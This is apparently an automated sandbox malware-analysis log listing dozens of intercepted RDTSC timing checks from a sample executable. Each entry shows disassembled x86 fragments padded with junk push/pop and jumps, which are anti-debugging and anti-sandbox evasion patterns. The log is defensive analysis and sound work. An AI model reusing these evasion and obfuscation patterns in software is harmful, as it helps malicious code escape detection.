Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74978D second address: 7497A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jnp 00007FED74F3E51Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DFD9 second address: 74DFE5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FED75508866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74D88E second address: 74D8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FED74F3E51Fh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FED74F3E51Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74D8BC second address: 74D8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DD1E second address: 74DD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DD22 second address: 74DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DD31 second address: 74DD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 74DD3B second address: 74DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7527AA second address: 7527AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7527AE second address: 7527DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FED75508866h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007FED75508866h 0x0000001b pop edi 0x0000001c pushad 0x0000001d jmp 00007FED7550886Ah 0x00000022 je 00007FED75508866h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75298D second address: 752994 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752994 second address: 75299C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75299C second address: 7529A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752C69 second address: 752C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752C76 second address: 752C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752C80 second address: 752C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FED75508866h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752C8F second address: 752C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DCB second address: 752DD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DD1 second address: 752DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DD7 second address: 752DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DDD second address: 752DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752DE1 second address: 752E02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007FED75508878h 0x00000014 push esi 0x00000015 jmp 00007FED7550886Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA470 second address: 6FA475 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA475 second address: 6FA502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D3900h] 0x0000000e mov ebx, dword ptr [ebp+12481454h] 0x00000014 or edx, 4FA532EDh 0x0000001a add eax, ebx 0x0000001c add dword ptr [ebp+122D184Fh], esi 0x00000022 jc 00007FED7550886Ch 0x00000028 push eax 0x00000029 jmp 00007FED7550886Eh 0x0000002e mov dword ptr [esp], eax 0x00000031 mov dword ptr [ebp+122D1820h], edi 0x00000037 push 00000004h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FED75508868h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 sub dword ptr [ebp+122D184Fh], eax 0x00000059 call 00007FED7550886Fh 0x0000005e mov edi, dword ptr [ebp+122D3928h] 0x00000064 pop edi 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push edx 0x0000006a pop edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 6FA502 second address: 6FA510 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752F93 second address: 752F9D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED75508866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752F9D second address: 752FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752FA3 second address: 752FA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 752FA8 second address: 752FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 753B55 second address: 753B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED7550886Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 753B67 second address: 753B75 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7595BB second address: 7595C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75987C second address: 759897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FED74F3E525h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FED74F3E51Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 759EA2 second address: 759EC9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED7550886Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FED75508875h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75A74A second address: 75A76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FED74F3E516h 0x0000000a jmp 00007FED74F3E529h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AA35 second address: 75AA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AA3D second address: 75AA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FED74F3E516h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AA4D second address: 75AA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AA51 second address: 75AA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FED74F3E529h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AF84 second address: 75AF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AF88 second address: 75AF8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 75AF8C second address: 75AFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FED75508866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FED75508866h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 761012 second address: 761016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 761016 second address: 76101B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 764F61 second address: 764F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 764F65 second address: 764F6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7645CC second address: 7645E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E520h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7645E3 second address: 7645ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7645ED second address: 7645FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FED74F3E516h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7645FB second address: 764601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76C14F second address: 76C1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FED74F3E516h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FED74F3E528h 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FED74F3E516h 0x00000019 popad 0x0000001a jmp 00007FED74F3E523h 0x0000001f popad 0x00000020 pushad 0x00000021 jns 00007FED74F3E51Ah 0x00000027 push ebx 0x00000028 pushad 0x00000029 popad 0x0000002a pop ebx 0x0000002b push edx 0x0000002c jmp 00007FED74F3E51Fh 0x00000031 pop edx 0x00000032 push ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76C705 second address: 76C725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FED75508866h 0x00000011 jne 00007FED75508866h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76C725 second address: 76C73A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76CB89 second address: 76CB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76CB8F second address: 76CBB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FED74F3E516h 0x00000009 jl 00007FED74F3E516h 0x0000000f jmp 00007FED74F3E51Fh 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D2C9 second address: 76D2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D971 second address: 76D977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D977 second address: 76D991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FED7550886Bh 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D991 second address: 76D9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E529h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76D9AE second address: 76D9D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FED75508866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FED75508874h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76B8F9 second address: 76B91A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FED74F3E516h 0x00000010 pop eax 0x00000011 popad 0x00000012 push ebx 0x00000013 ja 00007FED74F3E51Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 76B91A second address: 76B935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FED75508870h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 774059 second address: 774070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E523h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773AAF second address: 773AB9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FED75508866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773D43 second address: 773D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773D60 second address: 773D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773D66 second address: 773D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 773D6B second address: 773D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77F899 second address: 77F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007FED74F3E516h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA05 second address: 77FA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA0B second address: 77FA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA11 second address: 77FA16 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA16 second address: 77FA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA23 second address: 77FA29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 77FA29 second address: 77FA34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 782171 second address: 782177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 78229B second address: 7822A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 793A55 second address: 793A5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 793A5E second address: 793A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FED74F3E51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 797398 second address: 7973A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FED75508866h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7973A4 second address: 7973A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 797220 second address: 79723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED75508879h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 79A8A4 second address: 79A8AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A125E second address: 7A1264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A1264 second address: 7A1271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FED74F3E51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A1271 second address: 7A1278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A034A second address: 7A0350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A0350 second address: 7A0381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED7550886Fh 0x0000000b pushad 0x0000000c jmp 00007FED75508879h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7A2AD2 second address: 7A2B3A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E51Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007FED74F3E516h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FED74F3E520h 0x0000001f pop esi 0x00000020 jne 00007FED74F3E535h 0x00000026 jmp 00007FED74F3E51Dh 0x0000002b push esi 0x0000002c push edx 0x0000002d pop edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C319C second address: 7C31CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508878h 0x0000000b jmp 00007FED75508870h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
